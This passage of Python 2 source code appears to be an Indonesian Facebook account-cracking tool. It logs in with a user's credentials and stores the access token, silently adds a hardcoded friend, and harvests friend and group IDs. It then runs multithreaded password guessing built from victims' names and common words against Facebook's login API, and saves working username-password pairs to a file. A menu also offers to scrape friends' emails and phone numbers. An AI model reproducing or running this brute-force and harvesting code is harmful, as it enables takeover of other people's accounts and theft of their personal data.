'\x1b[32mVuln' def login(): os.system('clear') try: toket = open('login.txt', 'r') menu() except (KeyError, IOError): os.system('clear') print 55 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91mLOGIN AKUN FB DULU' print 55 * '\x1b[1;97m═' print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLOGIN AKUN FB \x1b[1;91m[\xe2\x98\x86]' id = raw_input('\x1b[1;91m[+] \x1b[1;36mEmail|ID \x1b[1;91m:\x1b[1;92m ') pwd = raw_input('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'} x = hashlib.new('md5') x.update(sig) a = x.hexdigest() data.update({'sig': a}) url = 'https://api.facebook.com/restserver.php' r = requests.get(url, params=data) z = json.loads(r.text) zedd = open('login.txt', 'w') zedd.write(z['access_token']) zedd.close() print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil' print '\n\x1b[1;96mSELAMAT MEMAKAI SC NYA ^_^' time.sleep(2.5) requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token']) time.sleep(1) menu() except requests.exceptions.ConnectionError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() if 'checkpoint' in url: print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' os.system('rm -rf login.txt') keluar() else: print '\n\x1b[1;91m[!] Login Gagal' os.system('rm -rf login.txt') login() def menu(): try: toket = open('login.txt', 'r').read() except IOError: os.system('clear') print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') login() else: try: otw = requests.get('https://graph.facebook.com/me?access_token=' + toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket) b = json.loads(ots.text) sub = str(b['summary']['total_count']) except KeyError: os.system('clear') print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint' os.system('rm -rf login.txt') login() except requests.exceptions.ConnectionError: print logo print '\x1b[1;91m[!] Tidak Ada Koneksi' keluar() os.system('clear') print logo print '\x1b[1;93m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗' print '\xe2\x95\x91\x1b[1;93m[\x1b[1;93m\xe2\x9c\x93\x1b[1;93m]\x1b[1;93m Nama \x1b[1;93m: \x1b[1;92m' + nama + (33 - len(nama)) * '\x1b[1;93m ' + '║' print '\xe2\x95\x91\x1b[1;93m[\x1b[1;93m\xe2\x9c\x93\x1b[1;93m]\x1b[1;93m ID FB SAYA \x1b[1;93m: \x1b[1;92m' + id + (33 - len(id)) * '\x1b[1;93m ' + '║' print '\xe2\x95\x91\x1b[1;93m[\x1b[1;93m\xe2\x9c\x93\x1b[1;93m]\x1b[1;93m Followers \x1b[1;93m: \x1b[1;92m' + sub + (33 - len(sub)) * '\x1b[1;93m ' + '║' print '\x1b[1;93m╠' + 50* '\xe2\x95\x90' + '║' print '║-» \x1b[1;36;49m1. Auto Crack \x1b[1;93m║' print '║-» \x1b[1;36;49m2. Manual Crack \x1b[1;93m║' print '║-» \x1b[1;36;49m3. Id Group \x1b[1;93m║' print '║-» \x1b[1;36;49m4. Ambil ID/Email/Hp Teman \x1b[1;93m║' print '║-» \x1b[1;36;49m5. Ganti Akun \x1b[1;93m║' print '║-» \x1b[1;36;49m0. Keluar \x1b[1;93m║' print '\x1b[1;93m╠' + 50* '\xe2\x95\x90' + '╝' pilih() def pilih(): zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;93m ') if zedd == '': print "\x1b[1;91m[!] Can't empty" pilih() else: if zedd == '1': autocrack() else: if zedd == '2': manualcrack() else: if zedd == '3': group() else: if zedd == '4': grab() else: if zedd == '5': os.system('rm -rf login.txt') keluar() else: if zedd == '0': keluar() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel' pilih() def autocrack(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print '\x1b[1;93m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗' print '\xe2\x95\x91\x1b\xe2\x9c\x93\x1b[1;93m{Menu Crack} \x1b[1;93m ║' print '\x1b[1;93m╠' + 50 * '\xe2\x95\x90' + '╝' print '║-> \x1b[1;93m 1. Crack from Friends' print '║-> \x1b[1;93m 2. Crack from Group' print '║-> \x1b[1;31;40m 0. Kembali' print '\x1b[1;93m║' pilih_super() def pilih_super(): peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if peak == '': print '\x1b[1;91m[!] Jangan kosong' pilih_super() else: if peak == '1': os.system('clear') print logo print 55 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) else: if peak == '2': os.system('clear') print logo print 55 * '\x1b[1;97m\xe2\x95\x90' idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/' + idg + '?access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName Friend \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() re = requests.get('https://graph.facebook.com/' + idg + '/friends?access_token=' + toket) s = json.loads(re.text) for i in s['data']: id.append(i['id']) else: if peak == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' pilih_super() print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack' print 55 * '\x1b[1;97m\xe2\x95\x90' sys.stdout.flush() def main(arg): user = arg try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|'+ pass1+'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass1 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass2 = b['first_name'] + '1234' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass2 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass2 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass3 = b['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass3 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass3 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass4 = b['first_name'] + '12356' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass4 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass4 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass5 = b['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass5 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass5 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass6 = b['last_name'] + '1234' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass6 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass6 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass7 = b['last_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass7 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass7 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass7 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass8 = b['last_name'] + '123456' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass8 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass8 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass9 = 'sayang' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass9 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass9 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass10 = 'anjing' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass10 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass10 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass10 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass11 = 'bangsat' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass11 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass11 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass11 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass12 = 'freefire' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass12 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass12 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass12 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass13 = 'doraemon' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass13 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass13 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass13 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass14 = 'januari' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass14 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass14 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass14 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass15 = 'password', data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass15 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass15 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass15 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass16 = 'persija123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass16 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass16 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass16 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass17 = 'indonesia' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass17 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass17 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass17 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass18 = 'tidakada' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass18 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass18 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass18 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass19 = b['first_name'] + b['last_name'] data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass19 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user + ' | ' + pass19 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass19 +' ==> ' + b['name'] else: pass20 = b['first_name'] + b['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass20 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;97m] ' + user +' | ' + pass20 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;97m] ' + user +' | ' + pass20 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass21 = b['first_name'] + b['last_name'] + '1234' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass20 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;97m] ' + user +' | ' + pass21 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;97m] ' + user +' | ' + pass21 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' except: pass p = ThreadPool(29) p.map(main, id) print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') autocrack() def manualcrack(): global file global idlist global passw os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;93m*SILAHKAN AMBIL KUMPULAN ID FACEBOOK TERLEBIH DAHULU*' print 52 * '\x1b[1;97m\xe2\x95\x90' idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword Crack Contoh(sayang) \x1b[1;91m: \x1b[1;97m') try: file = open(idlist, 'r') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') for x in range(40): zedd = threading.Thread(target=scrak, args=()) zedd.start() threads.append(zedd) for zedd in threads: zedd.join() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() def scrak(): global back global berhasil global cekpoint global gagal global up try: buka = open(idlist, 'r') up = buka.read().split() while file: username = file.readline().strip() url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = urllib.urlopen(url) mpsh = json.load(data) if back == len(up): break if 'access_token' in mpsh: bisa = open('Berhasil.txt', 'w') bisa.write(username + ' | ' + passw + '\n') bisa.close() berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: if 'www.facebook.com' in mpsh['error_msg']: cek = open('Cekpoint.txt', 'w') cek.write(username + ' | ' + passw + '\n') cek.close() cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: gagal.append(username) back += 1 sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint))) sys.stdout.flush() except IOError: print '\n\x1b[1;91m[!] Connection busy' time.sleep(1) except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' def hasil(): print print 52 * '\x1b[1;97m\xe2\x95\x90' for b in berhasil: print b for c in cekpoint: print c print print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal)) keluar() def group(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' try: uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket) gud = json.loads(uh.text) for p in gud['data']: nama = p['name'] id = p['id'] f = open('grupid.txt', 'w') listgrup.append(id) f.write(id + '\n') print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama) print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id) print 40 * '\x1b[1;97m=' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup) print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt' f.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() except KeyError: os.remove('grupid.txt') print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() def grab(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Ambil ID Dari Teman' print '║-> \x1b[1;37;40m2. Ambil ID Teman Dari Teman' print '║-> \x1b[1;37;40m3. Ambil ID Dari Grup' print '║-> \x1b[1;37;40m4. Ambil Email Dari Teman' print '║-> \x1b[1;37;40m5. Ambil Email Teman Dari Teman' print '║-> \x1b[1;37;40m6. Ambil No Hp Dari Teman' print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends' print '║-> \x1b[1;31;40m0. Kembali' print '\x1b[1;37;40m║' grab_pilih() def grab_pilih(): cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if cuih == '': print 